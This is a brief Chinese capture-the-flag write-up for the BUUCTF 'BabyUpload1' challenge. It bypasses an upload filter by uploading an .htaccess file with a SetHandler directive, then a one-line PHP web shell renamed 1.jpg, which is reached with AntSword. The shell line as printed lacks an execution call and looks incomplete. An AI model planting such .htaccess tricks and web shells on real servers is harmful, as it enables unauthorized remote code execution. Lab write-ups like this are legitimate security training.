BUUCTF WEB BabyUpload1

最简单的一个文件上传，理论上只支持文件内容极少的jpeg和jpg，是的，你没有听错，内容极少
所以不要尝试去尝试上传一个jpg图片检测文件后缀，因为网上download下来的图片绝大多数内容超过限制
ok，那么经过检测，.htaccess没有被过滤
那么上传一个.htaccess文件，内容为
SetHandler application/x-httpd-php
表示凡是.htaccess文件夹所在目录的文件都由php进行处理
然后上传一句话，<script language=php>$_POST['hello']</script>,文件名改为1.jpg
上传成功，蚁剑链接，end
参考视频链接:https://www.bilibili.com/video/BV1Y44y1i74c/

标签：WEB,BUUCTF,文件,jpg,htaccess,内容,php,上传,BabyUpload1
来源： https://blog.csdn.net/qq_41696858/article/details/121065284